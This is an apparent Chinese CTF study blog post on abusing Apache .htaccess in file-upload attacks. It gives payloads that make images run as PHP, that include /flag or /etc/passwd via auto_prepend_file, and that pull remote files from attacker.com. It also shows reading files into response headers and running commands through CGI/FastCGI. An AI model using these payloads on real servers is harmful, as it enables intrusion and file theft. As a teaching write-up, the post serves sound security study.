<!DOCTYPE html><html lang="zh-CN" theme-mode="dark"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><title>文件上传-.htaccess | wOYOm的博客</title><link rel="icon" type="image/x-icon" href="/favicon.ico"><link rel="preload" as="font" crossorigin="anonymous" href="/font/Bender.ttf"><link rel="preload" as="font" crossorigin="anonymous" href="/font/BenderLight.woff2"><link rel="preload" as="font" crossorigin="anonymous" href="/font/JetBrainsMono-Regular.woff2"><link rel="stylesheet" href="/css/arknights.css"><style>@font-face {
  font-family: Bender;
  src: local('Bender'), url("/font/Bender.ttf"), url("/font/Bender.otf");
}
@font-face {
  font-family: BenderLight;
  src: local('BenderLight'), url("/font/BenderLight.ttf");
}
@font-face {
  font-family: 'JetBrains Mono';
  src: local('JetBrains Mono'), url('/font/JetBrainsMono-Regular.woff2') format('woff2');
}
</style><meta name="page-config" content="{&quot;code_fold&quot;:null}"><script class="pjax-js">var config = {"root":"/","code_fold":15,"search":{"preload":false,"activeHolder":"Enter here","blurHolder":"Search","noResult":"Data \"$0\" not found"},"code":{"codeInfo":"$0 - $1 lines","copy":"copy"}};
var page_config = {
  code_fold: null
};
function updatePageConfig() {
  var newPageConfig = document.querySelector('meta[name="page-config"]');
  if (newPageConfig) {
    page_config = JSON.parse(newPageConfig.content);
  }
}
document.addEventListener('pjax:complete', function() { updatePageConfig(); });
updatePageConfig();</script><link type="text/css" rel="stylesheet" href="/lib/encrypt/hbe.style.css"><script src="//unpkg.com/mermaid@10.5.0/dist/mermaid.min.js"></script><link type="text/css" rel="stylesheet" href="//unpkg.com/lightgallery@2.7.1/css/lightgallery.css"><link type="text/css" rel="stylesheet" href="//unpkg.com/lightgallery@2.7.1/css/lg-zoom.css"><link type="text/css" rel="stylesheet" href="//unpkg.com/lightgallery@2.7.1/css/lg-thumbnail.css"><link type="text/css" rel="stylesheet" href="/lib/fontawesome/css/all.min.css"><script>if (window.localStorage.getItem('theme-mode') === 'light')
 document.documentElement.setAttribute('theme-mode', 'light')
if (window.localStorage.getItem('theme-mode') === 'dark')
 document.documentElement.setAttribute('theme-mode', 'dark')</script><style>@font-face {
 font-family: BenderLight;
 src: local('Bender'), url("/font/BenderLight.woff2") format('woff2');
}
@font-face {
 font-family: 'JetBrains Mono';
 src: local('JetBrains Mono'), url('/font/JetBrainsMono-Regular.woff2') format('woff2');
}</style><style>:root {
 --dark-background: url('https://image-assets.mihuashi.com/permanent/4636128|-2024/07/15/22/FoQgPgpt91kubhyYFgogmbaUv5ws.jpg');
 --light-background: url('https://image-assets.mihuashi.com/permanent/4636128|-2024/07/15/22/FoQgPgpt91kubhyYFgogmbaUv5ws.jpg');
 --theme-encrypt-confirm: 'confirm'
}</style><script defer src="/js/arknights.js"></script><script defer src="/js/search.js"></script><script defer src="https://vercount.one/js"></script><script defer type="module">import mermaid from '//unpkg.com/mermaid@10.5.0/dist/mermaid.esm.mjs';
window.mermaid = mermaid;
code.paintMermaid();
</script><script async src="//unpkg.com/lightgallery@2.7.1/lightgallery.min.js"></script><script async src="//unpkg.com/lightgallery@2.7.1/plugins/zoom/lg-zoom.min.js"></script><script async src="//unpkg.com/lightgallery@2.7.1/plugins/thumbnail/lg-thumbnail.min.js"></script><script async src="/lib/encrypt/hbe.js"></script><script async src="/js/pjax.js"></script><script class="pjax-js">reset= () => {document.querySelector('.lg-container')?.remove()
lightGallery(document.getElementById('post-bg'), {
  plugins: [lgZoom,lgThumbnail],
  selector: '.item-img'})}</script><script>window.addEventListener("load",() => {pjax = new Pjax({
 cacheBust: false,
 selectors: ['title','article','#aside-block','.pjax-js','data-pjax','.vercount','meta[name=page-config]'],
 switches: {'article': Pjax.switches.sideBySide},
 switchesOptions: {
   'article': {
     classNames: {
       remove: "pjax-out",
       add: "pjax-in"
     }
   }
 }
});
document.addEventListener("pjax:complete", reset);document.addEventListener('pjax:success', _ => {
 const script = document.createElement('script');
 script.src = 'https://vercount.one/js';
 document.head.appendChild(script);
});reset()})</script><script class="pjax-js">reset= () => {document.querySelector('.lg-container')?.remove()
const postBg = document.querySelector('#post-bg');
if (postBg) lightGallery(postBg, {
  plugins: [lgZoom,lgThumbnail],
  selector: '.item-img'})}</script><script>window.addEventListener("load",() => {pjax = new Pjax({
 cacheBust: false,
 selectors: ['title','article','#aside-block','.pjax-js','data-pjax','.vercount','meta[name=page-config]'],
 switches: {'article': Pjax.switches.sideBySide},
 switchesOptions: {
   'article': {
     classNames: {
       remove: "pjax-out",
       add: "pjax-in"
     }
   }
 }
});
document.addEventListener("pjax:complete", reset);document.addEventListener('pjax:success', _ => {
 const script = document.createElement('script');
 script.src = 'https://vercount.one/js';
 document.head.appendChild(script);
});reset()})</script><meta name="generator" content="Hexo 7.3.0"></head><body><div class="loading" style="opacity: 0;"><div class="loadingBar left"></div><div class="loadingBar right"></div></div><main><header class="closed"><div class="navBtn"><i class="navBtnIcon"><span class="navBtnIconBar"></span><span class="navBtnIconBar"></span><span class="navBtnIconBar"></span></i></div><nav><div class="navItem" id="search-header"><span class="navItemTitle"><input autocomplete="off" autocorrect="off" autocapitalize="none" placeholder="Search" spellcheck="false" maxlength="50" type="text" id="search-input"></span></div><div class="navItem" id="search-holder"></div><div class="search-popup" tabindex="0"><div id="search-result"></div></div><ol class="navContent"><li class="navItem"><a class="navBlock" href="/"><span class="navItemTitle">Home</span></a></li><li class="navItem" matchdata="categories,tags"><a class="navBlock" href="/archives/"><span class="navItemTitle">Archives</span></a></li></ol></nav></header><article><div id="post-bg"><div id="post-title"><h1>文件上传-.htaccess</h1><div id="post-info"><span>First Post: <div class="control"><time datetime="2026-03-11T03:03:22.000Z" id="date"> 2026-03-11</time></div></span><br><span>Last Update: <div class="control"><time datetime="2026-03-13T06:37:31.062Z" id="updated"> 2026-03-13</time></div></span><br><span id="vercount_container_page_pv">Page View: <span class="control" id="vercount_value_page_pv">loading...</span></span></div></div><hr><div id="post-content"><h2 id="文件上传-htaccess文件篇"><a href="#文件上传-htaccess文件篇" class="headerlink" title="文件上传 .htaccess文件篇"></a>文件上传 .htaccess文件篇</h2><h3 id="一-htaccess文件是什么"><a href="#一-htaccess文件是什么" class="headerlink" title="一. .htaccess文件是什么"></a>一. .htaccess文件是什么</h3><p>.htaccess 是 Apache web 服务器的一种分布式配置文件。它允许在不修改主配置文件的情况下，对特定目录及其子目录的Apache行为进行配置。</p>
<p>&#x2F;&#x2F;小芝士：</p>
<p>.ht表示它是隐藏文件</p>
<p>access表示它用于控制访问权限和配置</p>
<p>**主要作用：**目录级配置</p>
<figure class="highlight txt"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs txt">/var/www/html/          # 主目录<br>├── .htaccess           # 影响整个html目录<br>├── admin/<br>│   └── .htaccess       # 只影响admin目录<br>└── upload/<br>    └── .htaccess       # 只影响upload目录<br></code></pre></td></tr></table></figure>

<p><strong>常见功能：</strong></p>
<p>URL重写：美化URL、重定向</p>
<p>访问控制：IP黑白名单、密码保护</p>
<p>错误页面定制：自定义404、403页面</p>
<p>MIME类型设置：定义文件类型的处理方式</p>
<p>缓存控制：设置浏览器缓存策略</p>
<p>文件索引：控制目录列表显示</p>
<h3 id="二-常见指令"><a href="#二-常见指令" class="headerlink" title="二.常见指令"></a>二.常见指令</h3><h4 id="①SetHandler（信息收集查看自己payload的触发情况）"><a href="#①SetHandler（信息收集查看自己payload的触发情况）" class="headerlink" title="①SetHandler（信息收集查看自己payload的触发情况）"></a>①SetHandler（信息收集查看自己payload的触发情况）</h4><p> 编辑.htaccess文件内容为</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php+HTML">SetHandler application/x-httpd-php //当前目录下的所有文件都会被当成php解析<br></code></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">SetHandler server-status // 这种方式利用了apache的服务器状态信息(默认关闭)，可以查看所有访问本站的记录<br></code></pre></td></tr></table></figure>

<p>通过访问特定文件（如一个不存在的文件）并加上 <code>?refresh=5</code> 参数，可以实时查看服务器的访问记录。</p>
<p>这里主要是信息收集，监控流量。</p>
<h4 id="②AddType（将图片当作php运行）"><a href="#②AddType（将图片当作php运行）" class="headerlink" title="②AddType（将图片当作php运行）"></a>②AddType（将图片当作php运行）</h4><p>可以将给定的文件扩展名映射到指定的内容类型</p>
<p>故使用 <code>AddType application/x-httpd-php .gif</code> 或 <code>AddType application/x-httpd-php .png .jpg</code> 等指令，可以将特定的文件后缀（如.gif, .png）映射到PHP处理器。</p>
<p>当网站只允许上传图片但限制不严时，攻击者上传一个名为 <code>shell.jpg</code> 或 <code>shell.png</code> 的图片马，并配合此<code>.htaccess</code>指令，使得服务器将该图片作为PHP执行，从而获取WebShell。</p>
<p>用法</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">AddType media-type extension [extension] ...<br>AddType application/x-httpd-php .gif<br>//将扩展名为.gif的文件当作php文件解析<br>AddType application/x-httpd-php png  jpg gif<br>//将以 .png .jpg .gif 多个后缀当做 php 解析<br></code></pre></td></tr></table></figure>

<h4 id="③AddHandler-（cgi脚本执行）"><a href="#③AddHandler-（cgi脚本执行）" class="headerlink" title="③AddHandler （cgi脚本执行）"></a>③AddHandler （cgi脚本执行）</h4><p>可以在文件扩展名与特定的处理器之间建立映射</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">AddHandler cgi-script .xxx<br>//可以将非标准的后缀名（如.xxx）映射到CGI处理器。<br></code></pre></td></tr></table></figure>

<p>如果服务器允许上传并执行CGI脚本，攻击者可以上传一个恶意的CGI脚本并修改其扩展名，通过此指令使其被正确执行。</p>
<h4 id="④php-value-文件上传（自动包含）及正则绕过"><a href="#④php-value-文件上传（自动包含）及正则绕过" class="headerlink" title="④php_value 文件上传（自动包含）及正则绕过"></a>④php_value 文件上传（自动包含）及正则绕过</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">php_value auto_prepend_file images.png <br>//作用是在每个PHP文件执行之前，自动包含并解析 images.png 文件。<br></code></pre></td></tr></table></figure>

<p>如果攻击者无法直接上传PHP文件，但可以上传一个包含PHP代码的图片（如 <code>images.png</code>），再通过此指令让所有PHP文件在解析前都自动包含这个图片。这样，攻击者访问网站上的任何一个正常的PHP页面，图片中的恶意代码就会被执行。这实质上是一种“自动包含”的GetShell方式。</p>
<p><strong>利用php_value绕过正则表达式限制</strong></p>
<p>通过设置 <code>php_value pcre.backtrack_limit 0</code> 和 <code>php_value pcre.jit 0</code> 来降低正则表达式的回溯限制。</p>
<p>原理是设置正则回朔次数来使正则匹配的结果返回为 false 而不是0 ，从而可以绕过正则。</p>
<h4 id="⑤php-flag-engine-0-获取源码（没啥用-）其实和你鼠标右键一样"><a href="#⑤php-flag-engine-0-获取源码（没啥用-）其实和你鼠标右键一样" class="headerlink" title="⑤php_flag engine 0 获取源码（没啥用 ）其实和你鼠标右键一样"></a>⑤php_flag engine 0 获取源码（没啥用 ）其实和你鼠标右键一样</h4><p><code>php_flag engine 0</code> 会关闭当前目录及子目录的PHP引擎。</p>
<p>这主要用于源码泄露。当一个目录下的文件原本应该被PHP解析输出动态内容时，如果PHP引擎被关闭，访问这些文件时，服务器将不再解析它们，而是直接返回文件的原始源代码。</p>
<h4 id="⑥一些其他的方法和他们的利用场景：DirectoryIndex"><a href="#⑥一些其他的方法和他们的利用场景：DirectoryIndex" class="headerlink" title="⑥一些其他的方法和他们的利用场景：DirectoryIndex"></a>⑥一些其他的方法和他们的利用场景：DirectoryIndex</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">DirectoryIndex index.html index.php index.htm // 设置目录的默认索引文件顺序<br>DirectoryIndex index.html index.php /123.txt //示例<br></code></pre></td></tr></table></figure>

<p><strong>指令作用</strong>：当用户访问一个目录（例如 <code>http://site.com/upload/</code>）时，Apache会在该目录下寻找<code>DirectoryIndex</code>指令指定的文件列表，并返回第一个找到的文件。如果所有文件都不存在，Apache会根据<code>Options</code>指令的配置，可能返回目录列表（如果开启了<code>Indexes</code>）或403禁止访问。</p>
<p>在Union ctf ezupload题中利用它<strong>制造一个“必然会失败”的文件查找过程</strong>。指令中的<code>/123.txt</code>指向<strong>文件系统根目录</strong>下的一个文件（通常不存在）。这个查找操作本身成为了一个“触发器”，目的是让Apache在处理请求时，顺带执行后续的<code>Header</code>指令。</p>
<p>如果服务器配置存在缺陷，可以通过设置<code>DirectoryIndex</code>指向一个已知的敏感文件（如<code>/etc/passwd</code>），观察服务器是返回文件内容还是报错，从而判断文件是否存在。</p>
<h4 id="⑦访问控制和功能配置Options-Indexes"><a href="#⑦访问控制和功能配置Options-Indexes" class="headerlink" title="⑦访问控制和功能配置Options +Indexes"></a>⑦访问控制和功能配置Options +Indexes</h4><p><code>Options</code>指令用于开启或关闭特定的服务器特性，<code>+Indexes</code>意味着当目录没有默认首页时，允许列出目录内容。可以简单的理解为提升了一下我们的权限。</p>
<p><strong>CTF利用场景</strong>：</p>
<ul>
<li><strong>信息泄露</strong>：<code>Options +Indexes</code>如果应用在敏感目录（如备份目录、上传目录），攻击者可以直接浏览并下载目录下的所有文件。</li>
<li>提升权限</li>
</ul>
<h4 id="⑧RewriteEngine-与-RewriteRule"><a href="#⑧RewriteEngine-与-RewriteRule" class="headerlink" title="⑧RewriteEngine 与 RewriteRule"></a>⑧RewriteEngine 与 RewriteRule</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">RewriteEngine On<br>RewriteRule ^product-([0-9]+)\.html$ product.php?id=$1<br></code></pre></td></tr></table></figure>

<p><strong>指令作用</strong>：<br><code>RewriteEngine On</code>用于开启重写引擎。<code>RewriteRule</code>用于定义具体的重写规则，它匹配请求的URL，并将其重定向到另一个路径或文件。</p>
<p>参考payload union ctf ezupload：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">RewriteEngine On<br>RewriteCond expr &quot;file(&#x27;/flag&#x27;) =~ /(.+)/&quot;<br>RewriteRule .* - [E=FLAG_CONTENT:%1]<br></code></pre></td></tr></table></figure>

<p>这里的<code>RewriteRule .* - [E=FLAG_CONTENT:%1]</code>：</p>
<ul>
<li><code>.*</code>匹配所有请求。</li>
<li><code>-</code>表示不进行重定向，也不改变URL。</li>
<li><code>[E=FLAG_CONTENT:%1]</code>是一个<strong>标志（flag）</strong>，它的作用是将<code>RewriteCond</code>中捕获的内容（<code>%1</code>，即flag文件的内容）赋值给一个名为<code>FLAG_CONTENT</code>的<strong>环境变量</strong>。<br>所以，这条<code>RewriteRule</code>本身不修改任何路径，它的唯一目的就是<strong>传递数据</strong>。</li>
</ul>
<p><strong>CTF利用场景</strong>：</p>
<ul>
<li><p><strong>数据传递</strong>：用<code>[E=变量名:%1]</code>将正则捕获的内容存储到环境变量中，供其他模块（如<code>mod_headers</code>）使用。</p>
</li>
<li><p><strong>路径伪造</strong>：可以重写URL，让看似普通的请求指向恶意文件。例如，上传一个图片马<code>shell.jpg</code>，然后通过<code>.htaccess</code>设置：</p>
<p>apache</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">RewriteEngine On<br>RewriteRule ^images/.*\.php$ shell.jpg [L]<br></code></pre></td></tr></table></figure>



<p>这样，当访问<code>images/shell.php</code>时，实际上返回的是<code>shell.jpg</code>的内容，但如果服务器将<code>.jpg</code>解析为PHP，就会执行恶意代码。</p>
</li>
<li><p><strong>信息读取</strong>：结合<code>RewriteCond expr</code>和<code>file()</code>函数，可以在不依赖PHP的情况下读取服务器文件。例如：</p>
<p>apache</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">RewriteCond expr &quot;file(&#x27;/etc/passwd&#x27;) =~ /(root:.*)/&quot;<br>RewriteRule .* - [E=USERINFO:%1]<br></code></pre></td></tr></table></figure></li>
</ul>
<h4 id="⑨Header-指令"><a href="#⑨Header-指令" class="headerlink" title="⑨Header 指令"></a>⑨Header 指令</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">Header set X-Powered-By &quot;Apache&quot;<br>Header set X-Custom-Header &quot;My Value&quot;<br></code></pre></td></tr></table></figure>

<p><strong>指令作用</strong>：<br><code>Header</code>指令用于添加、修改或删除HTTP响应头。它可以设置为静态值，也可以设置为动态表达式（<code>expr=</code>）。</p>
<p><code>Header</code>指令都是<strong>最终数据外带的关键</strong>。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">Header set X-Test-Expr &quot;%&#123;FLAG_CONTENT&#125;e&quot;<br></code></pre></td></tr></table></figure>

<p>这里从环境变量<code>FLAG_CONTENT</code>中读取flag内容，并写入响应头<code>X-Test-Expr</code>。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">Header set X-Flag &quot;expr=%&#123;file:/flag&#125;&quot;<br></code></pre></td></tr></table></figure>

<p>这里更直接，用<code>expr=%&#123;file:/flag&#125;</code>表达式，在设置响应头的同时，立即读取<code>/flag</code>文件的内容并写入响应头。</p>
<p><strong>利用场景</strong>：</p>
<ul>
<li><p><strong>数据外带</strong>：当响应体被限制（如PHP被禁用、内容被过滤）时，将敏感数据写入响应头是经典的绕过技巧。攻击者只需查看服务器的响应头即可获取信息。</p>
</li>
<li><p><strong>信息探测</strong>：通过设置响应头并观察服务器的行为，可以判断某些配置是否生效。例如，设置一个自定义头<code>X-Debug: expr=%&#123;ENV:SECRET&#125;</code>，如果返回了<code>SECRET</code>环境变量的值，说明配置解析成功。</p>
</li>
<li><p><strong>与<code>expr</code>深度结合</strong>：<code>expr</code>表达式可以调用Apache的内部函数（如<code>file()</code>、<code>reqenv()</code>）和变量（如<code>%&#123;TIME&#125;</code>）。这意味着可以通过<code>Header</code>指令实现<strong>动态内容生成</strong>。例如：</p>
<p>apache</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">Header set X-Server-Time &quot;expr=%&#123;TIME&#125;&quot;<br>Header set X-Request-ID &quot;expr=%&#123;UNIQUE_ID&#125;&quot;<br></code></pre></td></tr></table></figure></li>
</ul>
<h3 id="三-具体场景及其组合利用方式"><a href="#三-具体场景及其组合利用方式" class="headerlink" title="三.具体场景及其组合利用方式"></a>三.具体场景及其组合利用方式</h3><h4 id="①文件解析"><a href="#①文件解析" class="headerlink" title="①文件解析"></a>①文件解析</h4><p>当文件上传的黑名单没有限制 <code>.htaceess</code> 后缀，通过上传 <code>.htaccess</code> 文件，再上传图片，使图片的 <code>php</code> 恶意代码得以被解析执行。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">1.`SetHandler` 指令<br># 将images.png 当做 PHP 执行<br>&lt;FilesMatch  &quot;images.png&quot;&gt;<br>SetHandler  application/x-httpd-php<br>&lt;/FilesMatch&gt;<br><br>2.AddType<br># 将 .jpg 当做 PHP 文件解析<br>AddType application/x-httpd-php .jpg<br></code></pre></td></tr></table></figure>

<h4 id="②文件包含，本地文件包含-LFI-与敏感文件读取"><a href="#②文件包含，本地文件包含-LFI-与敏感文件读取" class="headerlink" title="②文件包含，本地文件包含 (LFI) 与敏感文件读取"></a>②文件包含，本地文件包含 (LFI) 与敏感文件读取</h4><h5 id="本地文件包含"><a href="#本地文件包含" class="headerlink" title="本地文件包含"></a>本地文件包含</h5><p>  目标：读取服务器上的敏感文件（如 &#x2F;etc&#x2F;passwd、&#x2F;flag）。   </p>
<p>  攻击链：上传 .htaccess 文件，内容为 php_value auto_prepend_file &#x2F;flag，并访问同目录下的一个合法的PHP文件（如 index.php）。</p>
<p>   结果：在 index.php 执行前，&#x2F;flag 文件的内容会被自动包含并执行。如果&#x2F;flag包含PHP代码，则会执行；如果是纯文本，其内容会被直接输出在页面中（如果PHP配置允许）。</p>
<p><strong>核心指令</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">指令								作用									区别<br>auto_prepend_file	在执行目标PHP文件之前，自动包含（include）指定的文件。	脚本执行前<br>auto_append_file	在执行目标PHP文件之后，自动包含（include）指定的文件。	脚本执行后<br></code></pre></td></tr></table></figure>

<p>这两个指令原本是为了方便开发者<strong>全局引入公共文件</strong>（如数据库连接配置、函数库）而设计的。</p>
<p>在 <code>.htaccess</code> 中，<code>php_value</code> 允许你<strong>动态修改</strong>这些配置，<strong>仅对当前目录及其子目录生效</strong>。</p>
<p>当指定的文件被包含时，PHP引擎会<strong>把它当作PHP代码来解析执行</strong>。</p>
<p>参考payload：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">#auto_prepend_file <br>配置文件：php_value auto_prepend_file /etc/passwd<br>或<br>#auto_append_file<br>配置文件：php_value auto_append_file /etc/passwd<br></code></pre></td></tr></table></figure>

<h5 id="远程文件包含"><a href="#远程文件包含" class="headerlink" title="远程文件包含"></a>远程文件包含</h5><p>前提条件：all_url_include<code>为</code>On，  在.htaccess文件中配置如下</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">php_value auto_append_file http://attacker.com/phpinfo.txt<br></code></pre></td></tr></table></figure>

<p><strong>结果</strong>：在访问任意一个页面的时候，目标服务器会远程获取 <code>phpinfo.txt</code>文件包含到页面中。</p>
<h4 id="③代码执行"><a href="#③代码执行" class="headerlink" title="③代码执行"></a>③代码执行</h4><h5 id="1-伪协议"><a href="#1-伪协议" class="headerlink" title="1.伪协议"></a>1.伪协议</h5><p>前提条件：all_url_fopen<code>、</code>all_url_include<code>为</code>On</p>
<p>在.htaccess文件中配置如下： </p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">php_value auto_append_file data://text/plain;base64,PD9waHAgcGhwaW5mbygpOw== //解码后内容为&lt;?php phpinfo(); ?&gt;<br>#php_value auto_append_file data://text/plain,%3C%3Fphp+phpinfo%28%29%3B<br><br></code></pre></td></tr></table></figure>

<p>在访问php页面后，会自动执行该配置文件，将<?php phpinfo(); ?>包含到php页面中并执行。</p>
<h5 id="2-解析-htaccess"><a href="#2-解析-htaccess" class="headerlink" title="2.解析.htaccess"></a>2.解析<code>.htaccess</code></h5><p>方法一：把.htaccess文件包含到当前页面中执行，打印配置文件到页面上，.htaccess文件配置：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">php_value auto_append_file .htaccess<br>#&lt;?php phpinfo();<br></code></pre></td></tr></table></figure>

<p>在htaccess配置文件中，#代表注释，在配置文件中，不起作用，但是，当该配置文件被包含到php文件中，注释后的php代码会被执行。</p>
<p>方法二：（适用与目录中没有php文件）</p>
<p>这种适合同目录或子目录没有 <code>php</code> 文件。需要先设置允许可访问 <code>.htaccess</code> 文件，在.htaccess文件中配置如下：设置允许可访问 <code>.htaccess</code> 文件</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">&lt;Files ~ &quot;^.ht&quot;&gt;<br> Require all granted<br> Order allow,deny<br> Allow from all<br>&lt;/Files&gt;<br></code></pre></td></tr></table></figure>

<p>再将 <code>.htaccess</code>指定当做 php文件处理</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">SetHandler application/x-httpd-php<br># &lt;?php phpinfo(); ?&gt;<br></code></pre></td></tr></table></figure>

<p>效果如图：</p class='item-img' data-src='https://woyom-1374329874.cos.ap-nanjing.myqcloud.com/image-20260313130557535.png'><img src="https://woyom-1374329874.cos.ap-nanjing.myqcloud.com/image-20260313130557535.png" alt="image-20260313130557535" style="zoom:80%;" />

<h4 id="④命令执行（这个方法很少见，试验了几个题目靶场基本没有mod-cgi-模块，仅作了解）"><a href="#④命令执行（这个方法很少见，试验了几个题目靶场基本没有mod-cgi-模块，仅作了解）" class="headerlink" title="④命令执行（这个方法很少见，试验了几个题目靶场基本没有mod_cgi 模块，仅作了解）"></a>④命令执行（这个方法很少见，试验了几个题目靶场基本没有<code>mod_cgi</code> 模块，仅作了解）</h4><p>传统 CGI 命令执行（mod_cgi）：</p>
<p><strong>CGI（Common Gateway Interface，公共网关接口）</strong> 是一种让Web服务器与外部程序（如脚本、可执行文件）交互的协议。</p>
<p>前提条件</p>
<p>Apache必须加载了 <code>mod_cgi</code> 模块。在apache主配置文件中应有：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">LoadModule cgi_module modules/mod_cgi.so<br></code></pre></td></tr></table></figure>

<p> .htaccess 配置详解</p>
<p>apache</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">Options ExecCGI              # 允许在该目录下执行CGI程序<br>AddHandler cgi-script .xx    # 将.xx后缀的文件当作CGI程序处理<br></code></pre></td></tr></table></figure>

<p><strong>指令作用</strong>：</p>
<ul>
<li><strong><code>Options ExecCGI</code></strong>：开启目录的CGI执行权限。默认情况下，出于安全考虑，CGI执行是关闭的。</li>
<li><strong><code>AddHandler cgi-script .xx</code></strong>：建立文件后缀与处理器的映射。这里将 <code>.xx</code> 后缀映射到 <code>cgi-script</code> 处理器，意味着任何以 <code>.xx</code> 结尾的文件都会被Apache当作CGI程序执行。</li>
</ul>
<p>示例：</p>
<p>miao.xx</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">#!C:/Windows/System32/cmd.exe /k start calc.exe<br>7<br></code></pre></td></tr></table></figure>

<p>这里是打开本地C盘计算器。在ctf里可以反弹shell的方式去进行命令执行，也可以直接编写</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">echo &quot;Content-Type: text/html&quot;<br>echo &quot;&quot;<br>echo &quot;&lt;h3&gt;Root Directory Listing:&lt;/h3&gt;&quot;<br>echo &quot;&lt;pre&gt;&quot;<br>ls -la /<br>echo &quot;&lt;/pre&gt;&quot;<br></code></pre></td></tr></table></figure>

<p>类似的命令程序直接进行执行。</p>
<p>FastCGI 命令执行（mod_fcgid）：</p>
<p><strong>FastCGI</strong> 是CGI的改进版本，旨在解决传统CGI为每个请求创建新进程的性能问题。它通过<strong>持久化进程</strong>来处理多个请求，提高了效率。<code>mod_fcgid</code> 是Apache实现FastCGI支持的模块。</p>
<p>前提条件</p>
<p>Apache必须加载了 <code>mod_fcgid</code> 模块：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">LoadModule fcgid_module modules/mod_fcgid.so<br></code></pre></td></tr></table></figure>

<p>.htaccess 配置详解</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">Options +ExecCGI                    # 开启CGI执行权限<br>AddHandler fcgid-script .xx         # 将.xx后缀的文件交给fcgid处理器<br>FcgidWrapper &quot;C:/Windows/System32/cmd.exe /k start calc.exe&quot; .xx<br></code></pre></td></tr></table></figure>

<p>此时miao.xx的文件内容可以是任意内容</p class='item-img' data-src='https://woyom-1374329874.cos.ap-nanjing.myqcloud.com/image-20260313135754630.png'><img src="https://woyom-1374329874.cos.ap-nanjing.myqcloud.com/image-20260313135754630.png" alt="image-20260313135754630" style="zoom:80%;" />

